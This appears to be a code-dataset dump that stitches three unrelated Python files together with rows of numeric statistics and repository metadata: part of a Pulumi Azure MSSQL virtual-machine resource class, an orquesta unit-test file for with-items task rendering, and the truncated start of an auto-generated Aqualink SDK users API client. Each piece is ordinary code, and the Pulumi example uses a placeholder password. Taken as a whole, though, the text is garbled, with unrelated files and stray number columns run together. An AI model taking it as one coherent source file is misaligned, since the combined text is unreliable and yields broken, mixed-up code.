        :param pulumi.Input[str] sql_license_type: The SQL Server license type. Possible values are `AHUB` (Azure Hybrid Benefit) and `PAYG` (Pay-As-You-Go). Changing this forces a new resource to be created.
        :param pulumi.Input[pulumi.InputType['VirtualMachineStorageConfigurationArgs']] storage_configuration: An `storage_configuration` block as defined below.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        :param pulumi.Input[str] virtual_machine_id: The ID of the Virtual Machine. Changing this forces a new resource to be created.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: VirtualMachineArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a Microsoft SQL Virtual Machine

        ## Example Usage

        This example provisions a brief Managed MsSql Virtual Machine.

        ```python
        import pulumi
        import pulumi_azure as azure

        example_virtual_machine = azure.compute.get_virtual_machine(name="example-vm",
            resource_group_name="example-resources")
        example_mssql_virtual_machine_virtual_machine = azure.mssql.VirtualMachine("exampleMssql/virtualMachineVirtualMachine",
            virtual_machine_id=example_virtual_machine.id,
            sql_license_type="PAYG",
            r_services_enabled=True,
            sql_connectivity_port=1433,
            sql_connectivity_type="PRIVATE",
            sql_connectivity_update_password="Password1234!",
            sql_connectivity_update_username="sqllogin",
            auto_patching=azure.mssql.VirtualMachineAutoPatchingArgs(
                day_of_week="Sunday",
                maintenance_window_duration_in_minutes=60,
                maintenance_window_starting_hour=2,
            ))
        ```

        ## Import

        Sql Virtual Machines can be imported using the `resource id`, e.g.

        ```sh
         $ pulumi import azure:mssql/virtualMachine:VirtualMachine example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.SqlVirtualMachine/sqlVirtualMachines/example1
        ```

        :param str resource_name: The name of the resource.
        :param VirtualMachineArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: either a single
        # VirtualMachineArgs object or the flat keyword-argument form.
        resource_args, opts = _utilities.get_resource_args_opts(VirtualMachineArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 auto_backup: Optional[pulumi.Input[pulumi.InputType['VirtualMachineAutoBackupArgs']]] = None,
                 auto_patching: Optional[pulumi.Input[pulumi.InputType['VirtualMachineAutoPatchingArgs']]] = None,
                 key_vault_credential: Optional[pulumi.Input[pulumi.InputType['VirtualMachineKeyVaultCredentialArgs']]] = None,
                 r_services_enabled: Optional[pulumi.Input[bool]] = None,
                 sql_connectivity_port: Optional[pulumi.Input[int]] = None,
                 sql_connectivity_type: Optional[pulumi.Input[str]] = None,
                 sql_connectivity_update_password: Optional[pulumi.Input[str]] = None,
                 sql_connectivity_update_username: Optional[pulumi.Input[str]] = None,
                 sql_license_type: Optional[pulumi.Input[str]] = None,
                 storage_configuration: Optional[pulumi.Input[pulumi.InputType['VirtualMachineStorageConfigurationArgs']]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 virtual_machine_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Shared implementation behind both __init__ overloads.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: build the input property bag.
            # (When opts.id is set, we are adopting an existing resource and
            # __props__ is supplied by get() below.)
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = VirtualMachineArgs.__new__(VirtualMachineArgs)

            __props__.__dict__["auto_backup"] = auto_backup
            __props__.__dict__["auto_patching"] = auto_patching
            __props__.__dict__["key_vault_credential"] = key_vault_credential
            __props__.__dict__["r_services_enabled"] = r_services_enabled
            __props__.__dict__["sql_connectivity_port"] = sql_connectivity_port
            __props__.__dict__["sql_connectivity_type"] = sql_connectivity_type
            __props__.__dict__["sql_connectivity_update_password"] = sql_connectivity_update_password
            __props__.__dict__["sql_connectivity_update_username"] = sql_connectivity_update_username
            # Required properties may only be omitted when rehydrating from an
            # existing URN (e.g. during a refresh).
            if sql_license_type is None and not opts.urn:
                raise TypeError("Missing required property 'sql_license_type'")
            __props__.__dict__["sql_license_type"] = sql_license_type
            __props__.__dict__["storage_configuration"] = storage_configuration
            __props__.__dict__["tags"] = tags
            if virtual_machine_id is None and not opts.urn:
                raise TypeError("Missing required property 'virtual_machine_id'")
            __props__.__dict__["virtual_machine_id"] = virtual_machine_id
        super(VirtualMachine, __self__).__init__(
            'azure:mssql/virtualMachine:VirtualMachine',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            auto_backup: Optional[pulumi.Input[pulumi.InputType['VirtualMachineAutoBackupArgs']]] = None,
            auto_patching: Optional[pulumi.Input[pulumi.InputType['VirtualMachineAutoPatchingArgs']]] = None,
            key_vault_credential: Optional[pulumi.Input[pulumi.InputType['VirtualMachineKeyVaultCredentialArgs']]] = None,
            r_services_enabled: Optional[pulumi.Input[bool]] = None,
            sql_connectivity_port: Optional[pulumi.Input[int]] = None,
            sql_connectivity_type: Optional[pulumi.Input[str]] = None,
            sql_connectivity_update_password: Optional[pulumi.Input[str]] = None,
            sql_connectivity_update_username: Optional[pulumi.Input[str]] = None,
            sql_license_type: Optional[pulumi.Input[str]] = None,
            storage_configuration: Optional[pulumi.Input[pulumi.InputType['VirtualMachineStorageConfigurationArgs']]] = None,
            tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
            virtual_machine_id: Optional[pulumi.Input[str]] = None) -> 'VirtualMachine':
        """
        Get an existing VirtualMachine resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[pulumi.InputType['VirtualMachineAutoBackupArgs']] auto_backup: An `auto_backup` block as defined below. This block can be added to an existing resource, but removing this block forces a new resource to be created.
        :param pulumi.Input[pulumi.InputType['VirtualMachineAutoPatchingArgs']] auto_patching: An `auto_patching` block as defined below.
        :param pulumi.Input[pulumi.InputType['VirtualMachineKeyVaultCredentialArgs']] key_vault_credential: (Optional) An `key_vault_credential` block as defined below.
        :param pulumi.Input[bool] r_services_enabled: Should R Services be enabled?
        :param pulumi.Input[int] sql_connectivity_port: The SQL Server port. Defaults to `1433`.
        :param pulumi.Input[str] sql_connectivity_type: The connectivity type used for this SQL Server. Defaults to `PRIVATE`.
        :param pulumi.Input[str] sql_connectivity_update_password: The SQL Server sysadmin login password.
        :param pulumi.Input[str] sql_connectivity_update_username: The SQL Server sysadmin login to create.
        :param pulumi.Input[str] sql_license_type: The SQL Server license type. Possible values are `AHUB` (Azure Hybrid Benefit) and `PAYG` (Pay-As-You-Go). Changing this forces a new resource to be created.
        :param pulumi.Input[pulumi.InputType['VirtualMachineStorageConfigurationArgs']] storage_configuration: An `storage_configuration` block as defined below.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        :param pulumi.Input[str] virtual_machine_id: The ID of the Virtual Machine. Changing this forces a new resource to be created.
        """
        # Setting opts.id routes _internal_init down its "adopt existing
        # resource" path, with this state bag as __props__.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _VirtualMachineState.__new__(_VirtualMachineState)

        __props__.__dict__["auto_backup"] = auto_backup
        __props__.__dict__["auto_patching"] = auto_patching
        __props__.__dict__["key_vault_credential"] = key_vault_credential
        __props__.__dict__["r_services_enabled"] = r_services_enabled
        __props__.__dict__["sql_connectivity_port"] = sql_connectivity_port
        __props__.__dict__["sql_connectivity_type"] = sql_connectivity_type
        __props__.__dict__["sql_connectivity_update_password"] = sql_connectivity_update_password
        __props__.__dict__["sql_connectivity_update_username"] = sql_connectivity_update_username
        __props__.__dict__["sql_license_type"] = sql_license_type
        __props__.__dict__["storage_configuration"] = storage_configuration
        __props__.__dict__["tags"] = tags
        __props__.__dict__["virtual_machine_id"] = virtual_machine_id
        return VirtualMachine(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="autoBackup")
    def auto_backup(self) -> pulumi.Output[Optional['outputs.VirtualMachineAutoBackup']]:
        """
        An `auto_backup` block as defined below. This block can be added to an existing resource, but removing this block forces a new resource to be created.
        """
        return pulumi.get(self, "auto_backup")

    @property
    @pulumi.getter(name="autoPatching")
    def auto_patching(self) -> pulumi.Output[Optional['outputs.VirtualMachineAutoPatching']]:
        """
        An `auto_patching` block as defined below.
        """
        return pulumi.get(self, "auto_patching")

    @property
    @pulumi.getter(name="keyVaultCredential")
    def key_vault_credential(self) -> pulumi.Output[Optional['outputs.VirtualMachineKeyVaultCredential']]:
        """
        (Optional) An `key_vault_credential` block as defined below.
        """
        return pulumi.get(self, "key_vault_credential")

    @property
    @pulumi.getter(name="rServicesEnabled")
    def r_services_enabled(self) -> pulumi.Output[Optional[bool]]:
        """
        Should R Services be enabled?
        """
        return pulumi.get(self, "r_services_enabled")

    @property
    @pulumi.getter(name="sqlConnectivityPort")
    def sql_connectivity_port(self) -> pulumi.Output[Optional[int]]:
        """
        The SQL Server port. Defaults to `1433`.
        """
        return pulumi.get(self, "sql_connectivity_port")

    @property
    @pulumi.getter(name="sqlConnectivityType")
    def sql_connectivity_type(self) -> pulumi.Output[Optional[str]]:
        """
        The connectivity type used for this SQL Server. Defaults to `PRIVATE`.
        """
        return pulumi.get(self, "sql_connectivity_type")

    @property
    @pulumi.getter(name="sqlConnectivityUpdatePassword")
    def sql_connectivity_update_password(self) -> pulumi.Output[Optional[str]]:
        """
        The SQL Server sysadmin login password.
        """
        return pulumi.get(self, "sql_connectivity_update_password")

    @property
    @pulumi.getter(name="sqlConnectivityUpdateUsername")
    def sql_connectivity_update_username(self) -> pulumi.Output[Optional[str]]:
        """
        The SQL Server sysadmin login to create.
        """
        return pulumi.get(self, "sql_connectivity_update_username")

    @property
    @pulumi.getter(name="sqlLicenseType")
    def sql_license_type(self) -> pulumi.Output[str]:
        """
        The SQL Server license type. Possible values are `AHUB` (Azure Hybrid Benefit) and `PAYG` (Pay-As-You-Go). Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "sql_license_type")

    @property
    @pulumi.getter(name="storageConfiguration")
    def storage_configuration(self) -> pulumi.Output[Optional['outputs.VirtualMachineStorageConfiguration']]:
        """
        An `storage_configuration` block as defined below.
        """
        return pulumi.get(self, "storage_configuration")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter(name="virtualMachineId")
    def virtual_machine_id(self) -> pulumi.Output[str]:
        """
        The ID of the Virtual Machine. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_machine_id")
| 51.718367
| 241
| 0.693868
| 4,300
| 38,013
| 5.853953
| 0.055814
| 0.0756
| 0.07699
| 0.034085
| 0.925195
| 0.914031
| 0.910218
| 0.90557
| 0.89969
| 0.885508
| 0
| 0.003965
| 0.210402
| 38,013
| 734
| 242
| 51.788828
| 0.834683
| 0.317076
| 0
| 0.823961
| 1
| 0
| 0.178907
| 0.111594
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163814
| false
| 0.066015
| 0.017115
| 0
| 0.278729
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
44ae14ad870b56f5ea786483b48850918bc37b46
| 12,811
|
py
|
Python
|
orquesta/tests/unit/conducting/native/test_task_rendering_for_with_items.py
|
trstruth/orquesta
|
e6ebbbeb2c661486067e659dc7552f0a986603a6
|
[
"Apache-2.0"
] | 3
|
2020-11-17T21:29:26.000Z
|
2021-03-17T13:56:16.000Z
|
orquesta/tests/unit/conducting/native/test_task_rendering_for_with_items.py
|
trstruth/orquesta
|
e6ebbbeb2c661486067e659dc7552f0a986603a6
|
[
"Apache-2.0"
] | 5
|
2021-03-02T01:41:36.000Z
|
2022-03-08T23:31:31.000Z
|
orquesta/tests/unit/conducting/native/test_task_rendering_for_with_items.py
|
trstruth/orquesta
|
e6ebbbeb2c661486067e659dc7552f0a986603a6
|
[
"Apache-2.0"
] | 15
|
2020-08-08T16:21:40.000Z
|
2022-03-17T04:45:51.000Z
|
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from orquesta import conducting
from orquesta.specs import native as native_specs
from orquesta import statuses
from orquesta.tests.unit import base as test_base
class WorkflowConductorWithItemsTaskRenderingTest(test_base.WorkflowConductorTest):
    """Tests rendering of with-items tasks in native workflow definitions.

    Each test builds a workflow spec from an inline YAML definition, runs the
    conductor, and checks either the rendered per-item action list or the
    errors produced for a malformed `with` clause.

    NOTE(review): the YAML indentation inside the wf_def literals was
    reconstructed from context — confirm against the original file.
    """

    def test_bad_item_key(self):
        # `item(y)` references a key that does not exist for items bound as `x`;
        # rendering must fail the workflow with a YAQL evaluation error.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with: x in <% ctx(xs) %>
            action: core.echo message=<% item(y) %>
        """

        expected_errors = [
            {
                'type': 'error',
                'message': (
                    'YaqlEvaluationException: Unable to evaluate expression \'<% item(y) %>\'. '
                    'ExpressionEvaluationException: Item does not have key "y".'
                ),
                'task_id': 'task1',
                'route': 0
            }
        ]

        spec = native_specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        # No tasks should be rendered; the workflow fails with the expected error.
        tasks = conductor.get_next_tasks()
        self.assertListEqual(tasks, [])
        self.assertEqual(conductor.get_workflow_status(), statuses.FAILED)
        self.assertListEqual(conductor.errors, expected_errors)

    def test_bad_item_type(self):
        # No key is declared in the `with` clause, so each item is a plain
        # string; `item(x)` therefore fails because items are not dicts.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with: <% ctx(xs) %>
            action: core.echo message=<% item(x) %>
        """

        expected_errors = [
            {
                'type': 'error',
                'message': (
                    'YaqlEvaluationException: Unable to evaluate expression \'<% item(x) %>\'. '
                    'ExpressionEvaluationException: Item is not type of dict.'
                ),
                'task_id': 'task1',
                'route': 0
            }
        ]

        spec = native_specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        tasks = conductor.get_next_tasks()
        self.assertListEqual(tasks, [])
        self.assertEqual(conductor.get_workflow_status(), statuses.FAILED)
        self.assertListEqual(conductor.errors, expected_errors)

    def test_bad_items_type(self):
        # `xs` is a scalar string, not a list, so the with-items clause itself
        # is invalid regardless of the item expression.
        wf_def = """
        version: 1.0

        vars:
          - xs: fee fi fo fum

        tasks:
          task1:
            with: x in <% ctx(xs) %>
            action: core.echo message=<% item(y) %>
        """

        expected_errors = [
            {
                'type': 'error',
                'message': 'TypeError: The value of "<% ctx(xs) %>" is not type of list.',
                'task_id': 'task1',
                'route': 0
            }
        ]

        spec = native_specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        tasks = conductor.get_next_tasks()
        self.assertListEqual(tasks, [])
        self.assertEqual(conductor.get_workflow_status(), statuses.FAILED)
        self.assertListEqual(conductor.errors, expected_errors)

    def test_start_task_rendering(self):
        # Happy path: a start task with `x in <% ctx(xs) %>` renders one
        # action spec per item, each tagged with its item_id.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with: x in <% ctx(xs) %>
            action: core.echo message=<% item(x) %>
        """

        spec = native_specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        task_route = 0
        next_task_name = 'task1'
        next_task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
        next_task_spec = conductor.spec.tasks.get_task(next_task_name)

        next_task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
            {'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
        ]

        expected_task = self.format_task_item(
            next_task_name,
            task_route,
            next_task_ctx,
            next_task_spec,
            actions=next_task_action_specs,
            items_count=len(next_task_ctx['xs']),
            items_concurrency=None
        )

        expected_tasks = [expected_task]
        actual_tasks = conductor.get_next_tasks()
        self.assert_task_list(conductor, actual_tasks, expected_tasks)

    def test_next_task_rendering(self):
        # Same as test_start_task_rendering, but the with-items task is a
        # downstream task; verifies rendering after task1 completes.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            action: core.noop
            next:
              - do: task2
          task2:
            with: x in <% ctx(xs) %>
            action: core.echo message=<% item(x) %>
        """

        spec = native_specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        # Process start task.
        task_route = 0
        next_task_name = 'task1'
        next_task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
        next_task_spec = conductor.spec.tasks.get_task(next_task_name)

        next_task_action_specs = [
            {'action': 'core.noop', 'input': None}
        ]

        expected_task = self.format_task_item(
            next_task_name,
            task_route,
            next_task_ctx,
            next_task_spec,
            actions=next_task_action_specs
        )

        expected_tasks = [expected_task]
        actual_tasks = conductor.get_next_tasks()
        self.assert_task_list(conductor, actual_tasks, expected_tasks)

        # Drive task1 to completion so task2 becomes eligible.
        status_changes = [statuses.RUNNING, statuses.SUCCEEDED]
        self.forward_task_statuses(conductor, next_task_name, status_changes)

        # Process next task.
        next_task_name = 'task2'
        next_task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
        next_task_spec = conductor.spec.tasks.get_task(next_task_name)

        next_task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
            {'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
        ]

        expected_task = self.format_task_item(
            next_task_name,
            task_route,
            next_task_ctx,
            next_task_spec,
            actions=next_task_action_specs,
            items_count=len(next_task_ctx['xs']),
            items_concurrency=None
        )

        expected_tasks = [expected_task]
        actual_tasks = conductor.get_next_tasks()
        self.assert_task_list(conductor, actual_tasks, expected_tasks)

    def test_basic_list_rendering(self):
        # Shorthand form: `with: <% ctx(xs) %>` with no key, items accessed
        # via the bare `item()` expression.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with: <% ctx(xs) %>
            action: core.echo message=<% item() %>
        """

        spec = native_specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        task_route = 0
        next_task_name = 'task1'
        next_task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
        next_task_spec = conductor.spec.tasks.get_task(next_task_name)

        next_task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
            {'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
        ]

        expected_task = self.format_task_item(
            next_task_name,
            task_route,
            next_task_ctx,
            next_task_spec,
            actions=next_task_action_specs,
            items_count=len(next_task_ctx['xs']),
            items_concurrency=None
        )

        expected_tasks = [expected_task]
        actual_tasks = conductor.get_next_tasks()
        self.assert_task_list(conductor, actual_tasks, expected_tasks)

    def test_basic_list_rendering_var_w_in(self):
        # Regression-style variant: the context variable name ("domains")
        # contains the substring "in", which must not confuse clause parsing.
        wf_def = """
        version: 1.0

        vars:
          - domains:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with: <% ctx(domains) %>
            action: core.echo message=<% item() %>
        """

        spec = native_specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        task_route = 0
        next_task_name = 'task1'
        next_task_ctx = {'domains': ['fee', 'fi', 'fo', 'fum']}
        next_task_spec = conductor.spec.tasks.get_task(next_task_name)

        next_task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
            {'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
        ]

        expected_task = self.format_task_item(
            next_task_name,
            task_route,
            next_task_ctx,
            next_task_spec,
            actions=next_task_action_specs,
            items_count=len(next_task_ctx['domains']),
            items_concurrency=None
        )

        expected_tasks = [expected_task]
        actual_tasks = conductor.get_next_tasks()
        self.assert_task_list(conductor, actual_tasks, expected_tasks)

    def test_multiple_lists_rendering(self):
        # Two lists zipped together; each item is a dict with keys x and y.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - foo
              - fu
              - marco
          - ys:
              - bar
              - bar
              - polo

        tasks:
          task1:
            with: x, y in <% zip(ctx(xs), ctx(ys)) %>
            action: core.echo message=<% item(x) + item(y) %>
        """

        spec = native_specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        task_route = 0
        next_task_name = 'task1'
        next_task_ctx = {'xs': ['foo', 'fu', 'marco'], 'ys': ['bar', 'bar', 'polo']}
        next_task_spec = conductor.spec.tasks.get_task(next_task_name)

        next_task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'foobar'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fubar'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'marcopolo'}, 'item_id': 2},
        ]

        expected_task = self.format_task_item(
            next_task_name,
            task_route,
            next_task_ctx,
            next_task_spec,
            actions=next_task_action_specs,
            items_count=len(next_task_ctx['xs']),
            items_concurrency=None
        )

        expected_tasks = [expected_task]
        actual_tasks = conductor.get_next_tasks()
        self.assert_task_list(conductor, actual_tasks, expected_tasks)
| 31.170316
| 96
| 0.543673
| 1,341
| 12,811
| 4.936614
| 0.126771
| 0.074924
| 0.0571
| 0.054532
| 0.830514
| 0.828399
| 0.824471
| 0.821148
| 0.800302
| 0.795317
| 0
| 0.008191
| 0.332917
| 12,811
| 410
| 97
| 31.246341
| 0.76644
| 0.046679
| 0
| 0.800623
| 0
| 0
| 0.282365
| 0.008855
| 0
| 0
| 0
| 0
| 0.071651
| 1
| 0.024922
| false
| 0
| 0.012461
| 0
| 0.040498
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
44e000959d86c618f9d201401ca8fa4bdcd9d5ef
| 24,062
|
py
|
Python
|
sdk/aqualink_sdk/api/users_api.py
|
aqualinkorg/aqualink-sdk
|
dad972d1dd5b74e8216bdc30521a8b76f7844733
|
[
"MIT"
] | 1
|
2022-02-06T23:05:37.000Z
|
2022-02-06T23:05:37.000Z
|
sdk/aqualink_sdk/api/users_api.py
|
aqualinkorg/aqualink-sdk
|
dad972d1dd5b74e8216bdc30521a8b76f7844733
|
[
"MIT"
] | 3
|
2022-02-07T06:13:31.000Z
|
2022-03-11T12:43:39.000Z
|
sdk/aqualink_sdk/api/users_api.py
|
aqualinkorg/aqualink-sdk
|
dad972d1dd5b74e8216bdc30521a8b76f7844733
|
[
"MIT"
] | null | null | null |
"""
Aqualink API documentation
The Aqualink public API documentation # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from aqualink_sdk.api_client import ApiClient, Endpoint as _Endpoint
from aqualink_sdk.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from aqualink_sdk.model.create_user_dto import CreateUserDto
from aqualink_sdk.model.inline_response404 import InlineResponse404
from aqualink_sdk.model.set_admin_level_dto import SetAdminLevelDto
from aqualink_sdk.model.site import Site
from aqualink_sdk.model.user import User
class UsersApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
    """Build the UsersApi, declaring one _Endpoint per operation.

    :param api_client: shared ApiClient; a default client is created when None.
    """
    if api_client is None:
        api_client = ApiClient()
    self.api_client = api_client

    # POST /users — unauthenticated user creation.
    self.users_controller_create_endpoint = _Endpoint(
        settings={
            'response_type': (User,),
            'auth': [],
            'endpoint_path': '/users',
            'operation_id': 'users_controller_create',
            'http_method': 'POST',
            'servers': None,
        },
        params_map={
            'all': [
                'create_user_dto',
            ],
            'required': [
                'create_user_dto',
            ],
            'nullable': [
            ],
            'enum': [
            ],
            'validation': [
            ]
        },
        root_map={
            'validations': {
            },
            'allowed_values': {
            },
            'openapi_types': {
                'create_user_dto':
                    (CreateUserDto,),
            },
            'attribute_map': {
            },
            'location_map': {
                'create_user_dto': 'body',
            },
            'collection_format_map': {
            }
        },
        headers_map={
            'accept': [
                'application/json'
            ],
            'content_type': [
                'application/json'
            ]
        },
        api_client=api_client
    )
    # DELETE /users/{id} — bearer-authenticated; id is a path parameter.
    self.users_controller_delete_endpoint = _Endpoint(
        settings={
            'response_type': None,
            'auth': [
                'bearer'
            ],
            'endpoint_path': '/users/{id}',
            'operation_id': 'users_controller_delete',
            'http_method': 'DELETE',
            'servers': None,
        },
        params_map={
            'all': [
                'id',
            ],
            'required': [
                'id',
            ],
            'nullable': [
            ],
            'enum': [
            ],
            'validation': [
            ]
        },
        root_map={
            'validations': {
            },
            'allowed_values': {
            },
            'openapi_types': {
                'id':
                    (float,),
            },
            'attribute_map': {
                'id': 'id',
            },
            'location_map': {
                'id': 'path',
            },
            'collection_format_map': {
            }
        },
        headers_map={
            'accept': [
                'application/json'
            ],
            'content_type': [],
        },
        api_client=api_client
    )
    # GET /users/current/administered-sites — sites the current user administers.
    self.users_controller_get_administered_sites_endpoint = _Endpoint(
        settings={
            'response_type': ([Site],),
            'auth': [
                'bearer'
            ],
            'endpoint_path': '/users/current/administered-sites',
            'operation_id': 'users_controller_get_administered_sites',
            'http_method': 'GET',
            'servers': None,
        },
        params_map={
            'all': [
            ],
            'required': [],
            'nullable': [
            ],
            'enum': [
            ],
            'validation': [
            ]
        },
        root_map={
            'validations': {
            },
            'allowed_values': {
            },
            'openapi_types': {
            },
            'attribute_map': {
            },
            'location_map': {
            },
            'collection_format_map': {
            }
        },
        headers_map={
            'accept': [
                'application/json'
            ],
            'content_type': [],
        },
        api_client=api_client
    )
    # GET /users/current — profile of the authenticated user.
    self.users_controller_get_self_endpoint = _Endpoint(
        settings={
            'response_type': (User,),
            'auth': [
                'bearer'
            ],
            'endpoint_path': '/users/current',
            'operation_id': 'users_controller_get_self',
            'http_method': 'GET',
            'servers': None,
        },
        params_map={
            'all': [
            ],
            'required': [],
            'nullable': [
            ],
            'enum': [
            ],
            'validation': [
            ]
        },
        root_map={
            'validations': {
            },
            'allowed_values': {
            },
            'openapi_types': {
            },
            'attribute_map': {
            },
            'location_map': {
            },
            'collection_format_map': {
            }
        },
        headers_map={
            'accept': [
                'application/json'
            ],
            'content_type': [],
        },
        api_client=api_client
    )
    # PUT /users/{id}/level — change a user's admin level; id in path, DTO in body.
    self.users_controller_set_admin_level_endpoint = _Endpoint(
        settings={
            'response_type': None,
            'auth': [
                'bearer'
            ],
            'endpoint_path': '/users/{id}/level',
            'operation_id': 'users_controller_set_admin_level',
            'http_method': 'PUT',
            'servers': None,
        },
        params_map={
            'all': [
                'id',
                'set_admin_level_dto',
            ],
            'required': [
                'id',
                'set_admin_level_dto',
            ],
